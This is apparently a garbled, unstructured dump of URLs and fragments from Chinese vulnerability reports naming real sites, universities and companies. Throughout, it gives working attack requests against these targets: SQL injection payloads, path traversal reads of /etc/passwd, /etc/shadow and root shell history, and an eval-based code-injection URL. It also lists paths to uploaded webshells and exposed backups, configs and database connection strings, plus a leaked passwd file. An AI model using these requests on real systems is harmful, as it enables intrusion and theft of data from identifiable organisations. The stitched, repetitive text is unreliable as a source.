http://ifsfd.fudan.edu.cn/lab/admin/news_more.asp?lm=1%27&lm2=69&open=_blank&tj=0&hot=0 http://www.flyertrip.com/photels/personalCenter/editTravel.php?flag=update&id=233 http://**.**.**.**/admin/main.do http://ku.ent.sina.com.cn/movie/24413的评分写评论处,支持分享到微博。有检查referer,但可以被绕过,只要referer中带有: http://test.com?http://ku.ent.sina.com.cn/movie/24413 http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.haiziwang.com/config.jsp shell:http://oa.fsh.cn/config.jsp http://202.102.90.234/js/config.jsp http://202.102.90.252/loginOffportal.action存在ST2命令执行 
http://**.**.**.**/bugs/wooyun-2016-0166751 http://**.**.**.**/webservices http://**.**.**.**//webservices/IHDZWXxtWs?wsdl http://ip/1.xml https://**.**.**.**/webservices/RoamService?wsdl https://**.**.**.**/webservices/RoamService c9aagCpSz5n4:16duo2of2 SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/ xmlns:soap="http://**.**.**.**/wsdl/soap/ xmlns:xsd="http://**.**.**.**/1999/XMLSchema xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance xmlns:m0="http://**.**.**.**/ xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/ xmlns:urn="http://**.**.**.**/RoamService SOAP-ENV:Header/ SOAP-ENV:Body urn:applyRoamTicket urn:in0 urn:in0 urn:applyRoamTicket SOAP-ENV:Body SOAP-ENV:Envelope https://**.**.**.**/webservices/RoamService c9aagCpSz5n4:16duo2of2 SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/ xmlns:soap="http://**.**.**.**/wsdl/soap/ xmlns:xsd="http://**.**.**.**/1999/XMLSchema xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance xmlns:m0="http://**.**.**.**/ xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/ xmlns:urn="http://**.**.**.**/RoamService SOAP-ENV:Header/ SOAP-ENV:Body urn:applyRoamTicket urn:in0 urn:in0 urn:applyRoamTicket SOAP-ENV:Body SOAP-ENV:Envelope http://202.111.44.69/zcgx/ http://202.111.44.69:80/console shell:http://202.111.44.69/ca/ma3.jsp?o=vLogin http://**.**.**.**/w423801/w00/index.action http://**.**.**.**/news/class/index.ph http://**.**.**.**/news-page.php?id=1 http://**.**.**.**/FCKeditor http://**.**.**.**/login.jsp) http://**.**.**.**/wd/ywxtlogin.jsp) http://**.**.**.**/) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/gui.asp?classid=79 http://**.**.**.**/admin/ad_login.asp http://**.**.**.**/uploadfile/jy.asp http://**.**.**.**/uploadfile/ http://wap.dwzq.com.cn/newscontent.php?mode=gaaaaaae&class=002452&seq=530675159&pageid=0&from=hqindex http://wap.dwzq.com.cn/images/ http://wap.dwzq.com.cn/download/ 
http://202.102.14.35:9080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29 http://202.102.14.35:9080/ksportal/aml/map/mapbranchinfo.jsp?area_id=30 http://202.102.14.35:9080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29 http://webapp.cbs.baidu.com/rsstopic/gate http://127.0.0.1:403 www.baidu.com这些都可以成功得到访问信息,确认ssrf的存在,接下来先探测主机端口 http://webapp.cbs.baidu.com/rsstopic/gate http://127.0.0.1:403 http://jyxh.e21.cn/login.php http://mail.huatu.com http://oss.cmge.com/login.action http://**.**.**.**/FCKeditor http://**.**.**.**/login.jsp) http://**.**.**.**/wd/ywxtlogin.jsp) http://**.**.**.**/) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/?c=down&m=index&filename=../../../index.php http://**.**.**.**:8080/ndap/querynews2.jsp?id=1490 http://**.**.**.**:8080/ndap/querynews2.jsp?id=1490%20and%20if%28length%28user%28%29%29=14,sleep%284%29,1%29 http://**.**.**.**/~lien/upload.htm http://**.**.**.**/~lien/uploadShell.htm http://**.**.**.**/~lien/File/Shell/Final/s9823/s9823.php http://**.**.**.**/ http://**.**.**.**/about.aspx?mid=68&pid=2*&sid=2 http://**.**.**.**/html/product01.asp?piid=3 http://oa.wuliusys.com/Login.aspx http://**.**.**.** http://ht.bnu.edu.cn/Editor/UpLoadImage http://**.**.**.**/ http://rest.tzg.cn/tzgCredit/investor/asset/red/list/v2 http://1.jiakao.com/index.php/jxgl/Index/shoufei.html http://115.236.50.28:8161/admin/test/systemProperties.jsp http://115.236.50.28:7288/index.php http://115.236.50.28:8161/admin/topics.jsp http://115.236.50.28:8161/admin/test/systemProperties.jsp http://balance.cmge.com/loginOut.action http://balance.cmge.com/upload/businessLicense/201601/11911.jsp http://120.26.3.80:8000/.svn/entries http://120.26.3.80:8000/test.php http://120.26.3.80:8000/t.php http://www.acfun.tv/member/#area=profile http://www.acfun.tv/member/signSubmit.aspx http://127.0.0.1/test/sign.html https://github.com/maqiong/admin_ext_git/blob/230f4595fb0fbeed126de4563fe75a097f906fa5/app/_function/functions.php 
https://github.com/maqiong/admin_ext_git/blob/230f4595fb0fbeed126de4563fe75a097f906fa5/app/_function/functions.php.bak www.rufengda.com http://www.rufengda.com http://www.rufengda.com/front/getCancelReason.do?orderNo=SL160106000028 http://b.agent.fang.com http://bbs.touna.cn/list-16/detail-122190-160-10.html/code https://github.com/pulchritude/emao.zt https://github.com/pulchritude/emao.ad http://sdkim.cmge.com/ http://cloud.ruijie.com.cn/rcs/login http://shop.ehuatai.com:7777/esale/login/rapidBaojiaAction-baojia.action http://shop.ehuatai.com:7777/isale/actions/logonAction-logon.action http://shop.ehuatai.com:7777/esale/login/rapidBaojiaAction-baojia.action http://fenxiao.lvmama.com/ http://fenxiao.lvmama.com/system/modifyUserMenu.jsp?user_id=1111,此user_id参数存在注入,DBA权限,包含20个数据库大量数据。经过搜索,发现此系统登陆账号存在于数据库SAAS14的USR_LOGIN表中,从而可获得任意一个账号登陆名和密码,公司员工账号为管理员,进入后均能进行分销商管理和订单管理等等敏感操作。 http://www22.53kf.com http://**.**.**.**/listgcss.asp?classid=24 http://mg.cmge.com/login.action http://oa.baison.com.cn:8080/ https://github.com/ray820328/game_admin_ray/blob/master/config/mail.properties http://119.29.35.245/admin/newIndex.do https://github.com/ray820328/game_admin_ray/blob/master/config/applicationContext.xml http://www.emaotai.cn:90/oAPI/API/eCenter/Member/GetMemberlist http://www.emaotai.cn:90/oAPI/API/eCenter/Member/GetMemberlist?khmc=%E4%B9%B0%E4%B9%90%E4%B9%90 http://www.emaotai.cn:90/oAPI/API/eCenter/Member/GetMemberlist?khmc=%E4%B9%B0%E4%B9%90%E4%B9%90 http://www.emaotai.cn/Storage/master/banner/20160106102147_8175.aspx http://219.223.252.7:8880/rsgl/recruit/logout.do http://old.cmge.com/WEB-INF/web.xml http://old.cmge.com/WEB-INF/classes/struts.xml http://old.cmge.com/WEB-INF/classes/applicationContext.xml http://old.cmge.com/WEB-INF/classes/hibernate.cfg.xml jdbc:mysql://192.168.1.151:3306/cmge?useUnicode=true&characterEncoding=UTF-8"/ http://www.acfun.tv/api/mail.aspx?name=newMail http://127.0.0.1/test/sign.html 
http://202.104.30.126/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=.com/ http://api.airchina.com.cn http://api.airchina.com.cn:1790/ http://api.airchina.com.cn:1790/download.php?version=../../../../../../../../../../etc/passwd&file=privacy http://api.airchina.com.cn:1790/download.php?version=../../../../../../../usr/local/ctccap/ui/actions/delivery.inc&file=default https://github.com/chenghaiyang/vcredit/blob/67c7aa0a023805a985b7c7af6b9792ddef2359aa/ccl-branches-v2.0.1/src/main/java/com/vcredit/jdev/ccl/integration/weixin/WeiXinOAuthService.java http://www.kkcredit.cn/kakadai/index.html#fivepage https://github.com/chenghaiyang/vcredit/blob/67c7aa0a023805a985b7c7af6b9792ddef2359aa/ccl-branches-v2.0.1/src/main/resources/config/application.properties http://**.**.**.**/index001/shiyanshi/index.html http://www.acfun.tv/api/friend.aspx http://**.**.**.**:8080/jhsyB/login.do?method=weblogin http://**.**.**.**:8080 http://**.**.**.**/ http://17shop.lenovo.com.cn http://drp.emaotai.cn/ http://www.emaotai.cn:100/drp/ http://git.emaotai.cn/ http://hr.emaotai.cn/ cn:5000 http://116.31.92.73 http://**.**.**.**:4180/login/login.do http://58.61.161.99 http://**.**.**.**/ordermanager/clientlist.aspx http://**.**.**.**/sysmanager/userlist.aspx http://**.**.**.**/travel/taipei7p.asp?id=1457 http://marxism.pku.edu.cn/loginController.do?login http://183.136.184.77/rmp/home/nav.action#load/data-view www.jiankongbao.com jdbc:oracle:thin:@**.**.**.**:1521:odsdb http://119.147.144.221:8000/admin/login.action http://119.147.144.221/admin/adminLogin.action http://17shop.lenovo.com.cn http://www.sdcofco.com/ http://218.57.146.238:8090/qxgl/1.jsp http://clsy.cust.edu.cn/Admin/admin_users/admin_user.asp?action=adduser http://clsy.cust.edu.cn/Admin/admin_users/admin_user.asp?action=login http://www.chinaccm.com/SDHTML/SDICIndex.aspx?IndustryID=1461 
http://**.**.**.**/yyoa/index.jsp使用致远A6的OA存在公用的注入漏洞 http://pm.chunshuitang.com/ http://www.oppodigital.com.tw/ https://idgame.boyaa.com/newsinfo.php?newsid=29 http://bill.bestpay.com.cn:37006 http://mail.bestpay.com.cn/ http://www.qoros.com/admincp/site/operator/news/list/get_news_detail.php?news_id=12 http://**.**.**.**/ewebeditor/admin/login.php root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webadmin:x:500:500::/home/webadmin:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash http://**.**.**.**/sql/ http://www.einfo.net.cn/whut/newsmanage/showinDefault_index2.jsp?typeid=1 http://**.**.**.**:7001/zskwG/123.jsp http://member.shopin.net/findMpassword?mobile=138********&m_password=nothing http://note.youdao.com/group/ 
http://slide.toutiao.com/ http://www.ihaier.com/incubator/index/type/5/order/*/city/0/p/2 http://219.239.88.138/phpmyadmin http://219.239.88.96/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://219.239.88.96/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://219.239.88.62/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://mail.cmge.com/ http://**.**.**.**/,图中标识链接存在漏洞 http://m.cnmo.com/smart/index.php?c=AjaxDoc&m=HotInfos http://m.cnmo.com/smart/529709.html http://m.cnmo.com http://219.143.213.19/ http://219.143.213.19:8080/ http://172.24.2.33:9999 http://125.71.204.20:9999 http://221.179.193.208/ http://221.179.193.208/dsystem/scripts/jquery-validate/demo/captcha/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/demo/captcha/fonts/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/demo/captcha/images/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/lib/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/localization/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/.svn/entries http://221.179.193.208/dsystem/ http://221.179.193.208/dsystem/operation_category.txt http://221.179.193.208/dsystem/Graph/include/config.php http://gksx.free.ezvpn.cn:8080/yyoa/ http://gksx.free.ezvpn.cn:8080/yyoa/assess/js/initDataAssess.jsp http://gksx.free.ezvpn.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://gksx.free.ezvpn.cn:8080/yyoa/createMysql.jsp http://ucenter.baomihua.com/install/uc.sql http://ucenter.baomihua.com/data/backup/backup_150915_ncPELi/150915_q8K5ST-1.sql http://bbs.baomihua.com/install/data/install.sql http://bbs.baomihua.com/adata/backup_150915_ncPELi/150915_5mHvuO-1.sql http://**.**.**.** http://**.**.**.** URL:sqlmap http://**.**.**.**/search.php/index/1?key=%25 http://yiyizuche.cn/1234/56/123456789/ http://**.**.**.**:8080 http://**.**.**.**:8080/changLang.action 
http://**.**.**.**:8080/voip/basemanager/dobakdata http://**.**.**.**:8080/voip/upload/test.jsp http://**.**.**.**/ http://**.**.**.**/index.php?func=appraise&action=detail&a_id=19 http://**.**.**.**/search?keywords=ad'&x=17&y=9 http://**.**.**.**/search/index http://**.**.**.**/search?keyword=jk&= http://**.**.**.**/index/search?keyword=ghj http://**.**.**.**/search?keywords=ppp http://**.**.**.**/search?keywords=asd http://**.**.**.**/search/index?keywords=hj http://**.**.**.**/index/search?keyword=fgh http://**.**.**.**/index/search?keyword=jkl http://**.**.**.**/search?keywords=pp http://**.**.**.**/search?keywords=asd http://**.**.**.**/search http://**.**.**.**/search?keywords=ad http://**.**.**.**/search?keywords=fghgf&x=8&y=12 http://**.**.**.**/search?keywords=ppp http://**.**.**.**/search?keywords=ad&x=17&y=9 http://**.**.**.**/search?keywords=ad&x=17&y=9 http://sdau.ecpay.cn发现个山东农业大学报名缴费系统,联行支持的,忽然想到,可以用find http://sdau.ecpay.cn/2.jsp jdbc:oracle:thin:@192.168.10.22:1521:cecpay jdbc:oracle:thin:@192.168.10.22:1521:cecpay jdbc:oracle:thin:@192.168.10.22:1521:cecpay http://mss.cosmo-lady.com/mss/logonNewAction.do?method=logon http://mss.cosmo-lady.com/mss/logonNewAction.do?method=logon http://120.197.42.190/ http://120.197.42.190/zecmd/zecmd.jsp http://218.5.65.215:8080/yyoa/ http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://218.5.65.215:8080/yyoa/assess/js/initDataAssess.jsp http://218.5.65.215:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 https://github.com/Javared/ixhong/blob/6b2b25ab32426cffddfc282060702e08d96eb374/ixhong-common/src/main/java/com/ixhong/common/mail/EmailSenderClient.java http://admin.xuehaodai.com/operations_log/audit_list.jhtml http://172.16.10.15/ci/asynchPeople/ http://172.16.10.39:8080/asynchPeople/ http://172.16.10.108:8080/ http://192.168.65.3/dashboard/db/basic-info http://192.168.65.27/ http://192.168.65.68/ http://192.168.65.93:8080/ui/#/apps https://user.ecpay.cn/ecm/test.Index.html 
https://**.**.**.**/tonny-zhang/mailer/blob/05b9117644aa2ead5806abaf1071e148282affdc/lib/mail/conf.php http://club.jr.jd.com/topic/602886 http://**.**.**.**/wis/ http://**.**.**.**/wis/jsp/DataQuery/queryTreeItem.dhcc?treeWhere=where%20LEVEL_1=!GTS!%20and%20LEVEL_2=!By%20Type!%20and%20LEVEL_3=!Notices!&catalog=%3EGTS%3EBy%20Type%3ENotices&flag=5 http://user.mapi.jiashuangkuaizi.com/UAddress/modify http://**.**.**.**/pmd/ http://t.5i5j.com/webapp/api/community/search.json?cityid=9&name=%E5%9B%9B%E5%B9%B3%E8%B7%AF1230%E5%8F%B7&_=1452149152891&__ajax_random__=0.08151449239812791&__jsonpcallback=xiaoqu_request1.render http://**.**.**/login.html https://ipcrs.pbccrc.org.cn/uddiexplorer/SetupUDDIExplorer.jsp http://21.10.6.13:7001 http://21.10.6.11:7001 http://21.10.6.14:7001 http://21.10.6.12:7001 http://21.10.6.65:7003 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**:7001 http://coupon.ele.me http://203.90.140.115/b2b/web/two/indexinfoAction.do?actionType=showCgxjDetail&xjbm=2016010003 https://c.163.com/dashboard#/m/repo/create/ http://mirrors.163.com/ubuntu/ http://**.**.**.**/Default.aspx http://**.**.**.**/js/main.asp?lh=1 http://tui.boyaa.com/index.php http://tui.boyaa.com/?controller=Account&action=step3 http://**.**.**.**/linghangvip/msnol/detail.asp?id=4729 http://**.**.**.**/staticindex.html http://120.197.42.190/solr http://124.193.66.106 http://202.108.145.94/redmine/ http://202.108.145.128/redmine/ http://**.**.**.**:7002/logonAction.do http://**.**.**.**/index.php/module/action/param1/$%7B@eval%28$_POST[c]%29%7D http://scrm.vivo.com.cn:3000 http://scrm.vivo.com.cn:30015/ http://www.elifepay.com.cn http://www.elifepay.com.cn/usercenter/getBackUserPwdByPhone.action www.elifepay.com.cn url:sqlmap http://**.**.**.**/Allinfo.aspx?SA=--%c8%ab%b2%bf--&FN=%* https://222.198.128.247:8880 http://**.**.**.**/03/chat/messagelist.asp?id= http://**.**.**.**/ 
http://**.**.**.**/download.php?id=17 http://**.**.**.**/goods/search.html?gname= http://**.**.**.**/ckfinder/ckfinder.html http://www.scrcoabj.com http://jj.cust.edu.cnsj-every.aspid=6 http://jj.cust.edu.cn/jj-every.asp?id=14 http://jj.cust.edu.cn/eWebEditor/admin_login.asp http://jj.cust.edu.cn/system/login.asp http://jj.cust.edu.cn/ewebeditor/ewebeditor.asp?id=content&style=standard http://jj.cust.edu.cn/eWebEditor/upload.asp http://jd.cust.edu.cn/teacher_show.asp?id=33 http://jd.cust.edu.cn/admin/admin_login.asp http://jd.cust.edu.cn/editor/fckeditor/editor/fckdebug.html http://jd.cust.edu.cn/editor/fckeditor/editor/fckeditor.html http://oa.tianya.cn http://wooyun.org/bugs/wooyun-2010-0136818 http://oa.tianya.cn/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**:8088/Login.aspx http://**.**.**.**/mcdm/welcome/home.seam http://998.com/Account/Sign这个地方登录位置,有验证码但是可绕过,用户名密码明文传输 http://robotim.vmall.com/live800/faq.jsp?companyId=8922 http://cos.sto.cn/web/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://wooyun.org/bugs/wooyun-2010-0136818 https://github.com/luningzju/sgccwooyunalert/blob/44497baa7f7f105f1e7b939864aeaba40561b0a2/sgccwooyunalert.py http://oa.998.com/web/careerapply/HrmCareerApplyPerEdit.jsp?id=1 url:sqlmap http://**.**.**.**/c/corp_news_details.php?itemid=457&page=01 http://**.**.**.** http://**.**.**.** http://**.**.**.**/main/wdb2/go.php?xmlid=28780&urlxmlid=28781 http://seba.cqu.edu.cn/eba/index.eda?fid=8&method=colContent http://**.**.**.**/index http://**.**.**.**:7001 http://**.**.**.**:7001 http://www.darryring.com/jewelry?style=duijie&page=1&title=印记 http://www.vmovier.com/user/forgetpwd http://www.yingdegas.com/s/index.php http://ehome.zte.com.cn/ http://**.**.**.**//News/NewsSearch.aspx?Search=aaa http://**.**.**.**/bugs/wooyun-2010-0126899 e905:c775:33b9%10 http://**.**.**.** http://radar.nju.edu.cn/wwwww/login.asp http://sc.nju.edu.cn/UploadFiles/20161811935990.aspx http://radar.nju.edu.cn/service.asp?id=10 
http://**.**.**.**/user/job_content.php?market_id=144 http://www.chinaccm.com/WebInfoList.aspx?Column=212404&end_date=&keyword=&PageIndex=7&start_date= http://**.**.**.**/Admin/Login.aspx http://**.**.**.**/pcStore/findByOrg?keyWords= http://27.17.7.236 http://**.**.**.**:8001/css/self/searchCertApply!searchCert.do http://www.jt510.cn/portal/index.action http://14.17.69.188/admin http://14.17.69.188/skyservice/pic?/etc/hosts http://14.17.69.188/skyservice/pic?/etc/shadow http://14.17.69.188/skyservice/pic?/root/.bash_history http://14.17.69.188/skyservice/pic?/usr/local/jboss/server/default/deploy/mysql-ds.xml http://manage.ezucoo.com/erc/login.action http://**.**.**.**:7001/存在“Java http://**.**.**.**/download/AppStore/0fe7858b2e6747082747b881b432888919942e6c2/com.xiaomi.market_R.1.4.5.apk http://**.**.**.**/php/news_detail.php?id=94 http://suyun.guest.daojia.com/api/guest/rechargeCheak http://suyun.guest.daojia.com/api/guest/rechargeact http://suyun.guest.daojia.com http://**.**.**.**/customer/vacon1/example_detail.asp?id=2014042813351300001 https://m.wangyin.com/ryze/transferRecord https://m.wangyin.com/ryze/transferRecord https://m.wangyin.com/ryze/transferStatus http://img20.360buyimg.com/payment/jfs/t1237/176/1060321396/24129/3671b827/557062baN2458bbda.png","inUserId":"1200006529071","inCustomerId":"360000000215219468 http://106.39.244.41 http://106.39.244.41:80/application/configs/application.ini http://**.**.**.** http://user.ftchinese.com/login http://**.**.**.**/brands/oe/category?cid=287 http://gix5-stag.glodon.com/index.jsp http://gix5-stag.glodon.com/web-console控制台未授权访问,所以我们可以直接getshell http://im.changyou.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://im.changyou.com/live800/downlog.jsp?path=/&fileName=/etc/shadow 
http://www.izuche.com/portalcarbooking/othern.aspx?CarTypeId=1&CityID=1¤tCarTypeName=%B4%F3%D6??%EF%CA?%AF%B5%B2&GetCarAddress=e&GetCarCity_txt=e&GetCarDate=e&GetCarTime=&IsGetCarVisit=true&IsReturnCarVisit=false&ReturnCarAddress=e&ReturnCarCity=1&ReturnCarCity_txt=e&ReturnCarDate=e&ReturnCarStore=10100821&ReturnCarTime=&StoreID=1&_=1451891611039 http://**.**.**.**/ http://**.**.**.**/about2.php?id=49 http://202.102.90.245/ http://**.**.**.**/contents/oldnews/news_view.asp?nid=80 http://**.**.**.**/news/main2_v.php?pid=682 http://tfzx.pku.edu.cn/admin/admin_index.asp http://**.**.**.**/prosemteacher.aspx?tid=2014091811471700001 http://**.**.**.**/News/List_News.aspx?SystemName=SchoolNews*&TypeID=3 http://**.**.**.**/products/products_list.php?cid=17 http://**.**.**.**/.svn/entries http://**.**.**.**/uc_server/.svn/entries http://**.**.**.**/WebMaster/?section=44 http://www.izuche.com/getpassword2.aspx?Mobile=13333333333 http://www.zyql.cn/ http://www.998.com/UniteLogin/UniteLogin?_t=t这个接口是格林豪泰主站接口,登录位置存在验证码,但是测试发现可以绕过的 http://bcscdn.baidu.com/ http://wap.izuche.com/FindPass.aspx http://**.**.**.**/e_news3.php?uid=468 http://**.**.**.**/e_news3.php?uid=468%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%280x7176627a71,user%28%29%29,NULL,NULL-- http://**.**.**.**/active_detail.php?classid=4&id=73* http://web.ccniit.com/WebPage/bdcb77eb-f7fd-4591-ad1a-f5ef5e7b2214.asp http://**.**.**.**)在登录部分的代码存在2处注入。能获取数据库、表信息。 http://**.**.**.**/console/judgeUserE**.**.**.**?method=judgeUserExist&username=admin http://**.**.**.**/console/judgeUserE**.**.**.**?method=judgeUserExist&username=1 http://**.**.**.**:8001/phrs/fileupload.jsp?proid=2b328d0703a74c26b027b1375aa2603f http://search.jr.jd.com/gs/search?q http://**.**.**.**/en/newsroom_event_details.php?id=3636 http://demo.phpok.com/admin.php www.5***** www.523***** www.zj***** www.***** www.xmh***** www.ycy***** www.***** www.bik***** 
http://t.5i5j.com/webapp/api/community/searchLocate.json?__ajax_random__=0.9211878408677876&name=%E5%92%8C%E6%96%B0%E5%8D%97%E8%8B%91&_=1452230352883&__jsonpcallback=map_addressSearch.render http://data.quanshang.hexun.com/ http://data.quanshang.hexun.com/yyfb/yywdByregion.aspx?region=307000000 http://share.gome.com.cn:8080/ http://share.gome.com.cn:8080/payment/f.jsp www.cofcohg.com/?m=Index&a=about_show&id=11 http://**.**.**.**/data.mdb http://www.x-lab.tsinghua.edu.cn:80/ www.x-lab.tsinghua.edu.cn http://**.**.**.**/ArticlesView.asp?bid=35&sid=0&id=421 http://**.**.**.**/articles.asp?bid=2 http://**.**.**.**/gsjj.asp?id=90&leixing=%E4%B8%AD%E5%BF%83%E7%AE%80%E4%BB%8B http://www.hillstonenet.com.cn:80/ www.hillstonenet.com.cn http://**.**.**.**/index.php?func=schedule&action=detail&sdc_id=2&sd_no=SR105000003 jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb http://106.3.36.125/dbws/home/login/login.html http://106.3.36.125/dbws/Home/DiseaseManage/diseaseinfo?dis_id=2048&dep_id=7&show_id=1 http://**.**.**.**/new.tar http://117.122.196.249/ http://117.122.196.247/ http://117.122.196.249/uddi/_uddi.jsp http://117.122.196.247/bea_wls_internal/_uddi.jsp http://**.**.**.**/Web/RentalNoticeDetail.aspxCountryCode=AU&CountryName=Australia http://**.**.**.**/employee/module/e0016/adm/addchgcontent.php?action=add&intTablePK= http://**.**.**.**/WebResource.axd?d=9GoCxXq47LP73lPhVAcBIA2 http://x86.sugon.com/goto_login.action查询系统 http://**.**.**.**/Index/news/show_list/catid/?catid=162&p=1 http://**.**.**.**/patent/show_list.html?&shop=1813 http://**.**.**.**/Good.aspx?GoodID=1004 http://**.**.**.**/Good.aspx?GoodID=1004 http://www.cang.com/ 
http://**.**.**.**/ncu7020/rdnewsletter/cover.php?action=show&cid=40&id=19 http://**.**.**.**/ncu7020/rdnewsletter/cover.php?action=show&cid=40&id=19%20and%20if%28ascii%28mid%28user%28%29%20from%201%20for%201%29%29=82,sleep%281%29,1%29 http://58.213.104.242:801 http://58.213.104.242:801/debug.txt http://58.213.104.242:801/ExcelFiles/ http://58.213.104.242:801/down/xml/ http://122.224.156.194:9090/daikuantouzi?rateEnd=10&rateBegin=0&istate=10&pageIndex=11 http://www.ineigo.com http://tc.homelink.com.cn/Academy/AcademyCertificateCourseMaintai03.aspx http://119.254.70.180/test.php http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://mys8.super8.com.cn:81/Login.aspx http://mys8.super8.com.cn:81/pages/bn/storesatisfaction/bn_storesatisfactionmanage.aspx http://**.**.**.**/training/ClassDetail.asp?CGID=936&CID=CLS201503191105018HF http://106.3.36.125:82/ http://**.**.**.**/search/data.mdb http://**.**.**.**/kzjz/ttpp/vote.asp?id=32 http://**.**.**.**//kzjz/admin/Login.asp http://**.**.**.**/admin/admin.php?P=Product http://**.**.**.**/index2.php?content=portfolio&uid=doris&msid=5447 http://sica.wh.sdu.edu.cn/admin http://58.213.104.242:802 http://58.213.104.242:802/APIService.asmx http://tempuri.org/Login soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema soap:Body http://tempuri.org/ soap:Body soap:Envelope http://jw.jlxy.nju.edu.cn/manage/login.aspx http://test.iosask.cn/dgws/ http://test.iosask.cn/dgws/home/mycure/patientinfo?aid=734 http://**.**.**.**:10000 http://doctor.langma.cn/home/index http://**.**.**.** coding:utf-8 http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134 http://**.**.**.**/news_show.asp?id=63 http://**.**.**.**/viewSingerHomepage.html?singerId=66243&loc=P21Z1Y1L2N1&locno=1 http://www.youjuu.com/about.html 
http://**.**.**.**/webserver/Ajax_homecenter.aspx?bproname=1callback=jQuery183031502415402792394_1452160270487&Type=gethouselist&_=1452160271484 http://www.legendsec.com/ http://t999.ensite.b2b.cn/admin/index.htm http://**.**.**.**/style_info.asp?newid=22 http://**.**.**.**/detail.php?articleId=50101 http://**.**.**.**/news2.php?fid=9&pg_no=789 http://**.**.**.**/2013/epaper/4c.php?id=54&aid=500 http://**.**.**.**/main/focus.php?aid=16 http://easyscholar.ruc.edu.cn/search.php?name=e IndexService.asmx/Login http://maomi.emao.com/ http://**.**.**.**/~cmu4c/2010/epaper/detail_2.php?id=16&kid=4 http://**.**.**.**:7001/equerying/login/logon.jsp http://**.**.**.**:7001/存在“Java http://logic.nju.edu.cn/show.php?catid=26&id=73 http://219.219.114.121/show.php?catid=36&id=11 http://116.199.115.135/jqweix/ http://116.199.115.135/weix/ http://116.199.115.135/zjsmweix/ http://114.251.197.194/ http://114.251.197.194/Login.aspx http://114.251.197.194/Login.aspx http://sqlmap.org http://114.251.197.194:80/Login.aspx http://**.**.**.**/ https://**.**.**.**/ http://boss.htd.cn/ http://www.mobee.tv/tvguide.htm的时候得到一个地址 http://admin-itvg.skyworthbox.com http://admin-itvg.skyworthbox.com/admin/adminLogin.action http://www.hisunsray.com/news/conews_view.asp?fileid=9863663&typeId=2550 